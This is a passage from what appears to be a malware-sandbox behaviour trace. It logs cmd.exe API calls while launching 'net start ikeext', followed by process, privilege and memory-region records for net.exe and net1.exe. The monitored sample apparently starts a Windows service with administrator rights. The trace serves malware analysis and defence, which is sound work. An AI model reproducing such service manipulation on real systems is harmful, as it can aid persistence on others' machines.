nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.684] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x181918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0048.685] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.685] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.685] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.685] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0048.685] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0048.685] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0048.685] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0048.685] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0048.685] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0048.685] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0048.685] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0048.685] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0048.685] GetEnvironmentStringsW () returned 0x182358* [0048.685] FreeEnvironmentStringsW (penv=0x182358) returned 1 [0048.685] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.685] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.685] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0048.685] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0048.685] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0048.685] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0048.685] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0048.685] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0048.685] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0048.685] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0048.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f988 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x12f988, lpFilePart=0x12f984 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x12f984*="system32") returned 0x13 [0048.686] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0048.686] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x12f704 | out: lpFindFileData=0x12f704) returned 0x1808f8 [0048.686] FindClose (in: hFindFile=0x1808f8 | out: hFindFile=0x1808f8) returned 1 [0048.686] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x12f704 | out: lpFindFileData=0x12f704) returned 0x1808f8 [0048.686] FindClose (in: hFindFile=0x1808f8 | out: hFindFile=0x1808f8) returned 1 [0048.686] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0048.686] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0048.686] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0048.686] GetEnvironmentStringsW () returned 0x1800c8* [0048.686] FreeEnvironmentStringsW (penv=0x1800c8) returned 1 [0048.686] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.688] _wcsnicmp (_String1="net ", _String2="cmd ", _MaxCount=0x4) returned 11 [0048.688] SetErrorMode (uMode=0x0) returned 0x8001 [0048.688] SetErrorMode (uMode=0x1) returned 0x0 [0048.688] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1707f8, lpFilePart=0x12f900 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x12f900*="system32") returned 0x13 [0048.688] SetErrorMode (uMode=0x8001) returned 0x1 [0048.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.688] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.693] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.693] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.693] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net start ikeext.*", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.693] GetLastError () returned 0x2 [0048.693] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net start ikeext", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.693] GetLastError () returned 0x2 [0048.693] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.693] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net start ikeext.*", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.694] GetLastError () returned 0x2 [0048.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net start ikeext", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.694] GetLastError () returned 0x2 [0048.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\net start ikeext.*", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.694] GetLastError () returned 0x2 [0048.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\net start ikeext", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.694] GetLastError () returned 0x2 [0048.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\net start ikeext.*", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.694] GetLastError () returned 0x2 [0048.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\net start ikeext", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.694] GetLastError () returned 0x2 [0048.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\net start ikeext.*", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.695] GetLastError () returned 0x2 [0048.695] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\net start ikeext", fInfoLevelId=0x1, lpFindFileData=0x12f67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f67c) returned 0xffffffff [0048.695] GetLastError () returned 0x2 [0048.695] GetConsoleOutputCP () returned 0x1b5 [0048.695] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.695] GetUserDefaultLCID () returned 0x409 [0048.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0048.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fac8, cchData=128 | out: lpLCData="0") returned 2 [0048.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fac8, cchData=128 | out: lpLCData="0") returned 2 [0048.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fac8, cchData=128 | out: lpLCData="1") returned 2 [0048.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0048.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0048.696] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0048.696] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0048.696] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0048.696] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0048.696] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0048.696] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0048.696] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0048.696] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0048.696] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0048.697] GetConsoleTitleW (in: lpConsoleTitle=0x170b18, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.697] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0048.697] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0048.697] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0048.697] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0048.698] GetConsoleTitleW (in: lpConsoleTitle=0x12f7c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.698] SetErrorMode (uMode=0x0) returned 0x8001 [0048.698] SetErrorMode (uMode=0x1) returned 0x0 [0048.698] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x181b68, lpFilePart=0x12f2e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x12f2e0*="system32") returned 0x13 [0048.698] SetErrorMode (uMode=0x8001) returned 0x1 [0048.698] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.698] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.698] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.699] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.699] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x12f05c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f05c) returned 0x181e30 [0048.699] FindClose (in: hFindFile=0x181e30 | out: hFindFile=0x181e30) returned 1 [0048.699] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x12f05c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f05c) returned 0xffffffff [0048.699] GetLastError () returned 0x2 [0048.699] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f05c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f05c) returned 0x181e30 [0048.699] FindClose (in: hFindFile=0x181e30 | out: hFindFile=0x181e30) returned 1 [0048.699] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0048.699] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0048.699] GetConsoleTitleW (in: lpConsoleTitle=0x12f554, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.699] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f3dc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f4a4 | out: lpAttributeList=0x12f3dc, lpSize=0x12f4a4) returned 1 [0048.699] UpdateProcThreadAttribute (in: lpAttributeList=0x12f3dc, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f49c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f3dc, lpPreviousValue=0x0) returned 1 [0048.699] GetStartupInfoW (in: lpStartupInfo=0x12f398 | out: lpStartupInfo=0x12f398*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0048.699] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0048.699] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0048.699] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0048.699] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0048.700] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0048.700] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0048.701] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net start ikeext", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x12f438*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net start ikeext", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f484 | out: lpCommandLine="net start ikeext", lpProcessInformation=0x12f484*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc34, dwThreadId=0xc38)) returned 1 [0048.704] CloseHandle (hObject=0x4c) returned 1 [0048.704] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0048.704] GetEnvironmentStringsW () returned 0x1800c8* [0048.704] FreeEnvironmentStringsW (penv=0x1800c8) returned 1 [0048.704] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0050.870] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f378 | out: lpExitCode=0x12f378*=0x0) returned 1 [0050.870] CloseHandle (hObject=0x50) returned 1 [0050.870] _vsnwprintf (in: _Buffer=0x12f4c0, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f384 | out: _Buffer="00000000") returned 8 [0050.870] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0050.870] GetEnvironmentStringsW () returned 0x182070* [0050.870] FreeEnvironmentStringsW (penv=0x182070) returned 1 [0050.871] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0050.871] GetEnvironmentStringsW () returned 0x182070* [0050.871] FreeEnvironmentStringsW (penv=0x182070) returned 1 [0050.871] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f3dc | out: lpAttributeList=0x12f3dc) [0050.871] _get_osfhandle (_FileHandle=1) returned 0x7 [0050.871] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0050.871] _get_osfhandle (_FileHandle=1) returned 0x7 [0050.871] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0050.871] _get_osfhandle (_FileHandle=0) returned 0x3 [0050.871] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0050.871] SetConsoleInputExeNameW () returned 0x1 [0050.871] GetConsoleOutputCP () returned 0x1b5 [0050.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0050.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0050.872] exit (_Code=0) Process: id = "19" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7eef7780" os_pid = "0xc34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xc20" cmd_line = "net start ikeext" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1314 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1315 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1316 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1317 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1318 start_va = 0xd20000 end_va = 0xd37fff entry_point = 0xd24905 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 1319 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1320 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1321 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1322 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1323 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1324 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1325 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1326 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1327 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1328 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1329 start_va = 0x6d0e0000 end_va = 0x6d0ecfff entry_point = 0x6d0e12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1330 start_va = 0x71dd0000 end_va = 0x71de1fff entry_point = 0x71dd1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1331 start_va = 0x734e0000 end_va = 0x734eefff entry_point = 0x734e125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1332 start_va = 0x73e70000 end_va = 0x73e7efff entry_point = 0x73e712a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1333 start_va = 0x73e80000 end_va = 0x73e88fff entry_point = 0x73e815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1334 start_va = 0x740e0000 end_va = 0x740e6fff entry_point = 0x740e128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1335 start_va = 0x740f0000 end_va = 0x7410bfff entry_point = 0x740fa431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1336 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75291319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1337 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1338 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1339 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1340 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1341 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1342 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1343 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1344 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 56 os_tid = 0xc38 Process: id = "20" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x7eef7800" os_pid = "0xc3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xc34" cmd_line = "C:\\Windows\\system32\\net1 start ikeext" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1345 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 